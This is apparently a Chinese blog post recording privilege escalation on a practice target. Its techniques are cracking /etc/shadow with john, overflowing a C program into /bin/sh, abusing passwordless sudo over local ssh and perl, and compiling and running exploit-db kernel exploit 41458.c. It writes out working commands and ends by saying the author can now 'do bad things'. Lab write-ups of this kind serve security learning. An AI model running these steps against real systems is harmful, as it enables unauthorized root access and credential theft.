靶场提权记录
目錄
1,下載 靶場的? /etc/passwd 文件 和 /etc/shadow 文件 并破解??
2, 利用 C語言程序溢出漏洞進行提權(前提是 程序中具有 代碼執行函數? execve())
3,在本地登錄 ssh 實現提權
4,使用 perl命令提權
5,利用 ubuntu 4.4.0內核 溢出 提權
1,下載 靶場的? /etc/passwd 文件 和 /etc/shadow 文件 并破解??
download /etc/passwd download /etd/shadow直接用 john 進行暴力破解
john shadow如果不成功,嘗試先把文件轉換為john可以識別的文件格式:
unshadow password shadow > crackedjohn cracked獲得用戶名和密碼后,先切換到破解出來的用戶,然后再切換到root
su - username //切換到 得到的用戶 Password:123123sudo su Password:1231232, 利用 C語言程序溢出漏洞進行提權(前提是 程序中具有 代碼執行函數? execve())
在使用ssh登錄后發現 當前目錄中有一個 read_message.c 文件
?
大致意思: 如果輸入的 字符串 的前五個字符 跟 Simon 相同的 就執行?
execve(program,null,null) 執行 usr/local/sbin/message
輸入Simonaaaaaa 后給了一些提示
那溢出之后 會不會執行我們溢出后的命令呢??(數組的大小為 20 )
試一下:輸入 Simonaaaaaaaaaaaaaaa/bin/sh? 使程序溢出,從而執行跳轉到/bin/sh下
我們真的提升了權限,成為了root權限
?
3,在本地登錄 ssh 實現提權
如果使用命令執行 在 /home/luoaho? 目錄下發現了 .ssh 目錄就可以使用?
ssh luohao@localhost sudo -l不需要輸入密碼就可以提升到 root 權限
4,使用 perl命令提權
查看用戶的sudo權限發現可以使用perl命令:
使用perl命令提權:
?
實例:成功提升到 root權限
5,利用 ubuntu 4.4.0內核 溢出 提權
查找漏洞利用代碼:
searchsploit ubuntu 4.4.0使用 第三個 41458.c文件
復制41458.c 內核溢出代碼 到 桌面, 并將腳本編譯成計算機能夠執行的文件
cp /usr/share/exploitdb/exploits/linux/local/41458.c /root/desktop/1234.cgcc 1234.c -o shellroot將shellroot 上傳到 靶機
upload /root/desktop/shellroot然后在shell 命令下 將shellroot 添加可執行權限
chmod 777 shellroot //賦予文件全部權限執行shellroot
./shellroot執行成功 ,已經變成了root權限,可以干壞事了
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
總結
- 上一篇: 《随笔 三》
- 下一篇: metasploit framework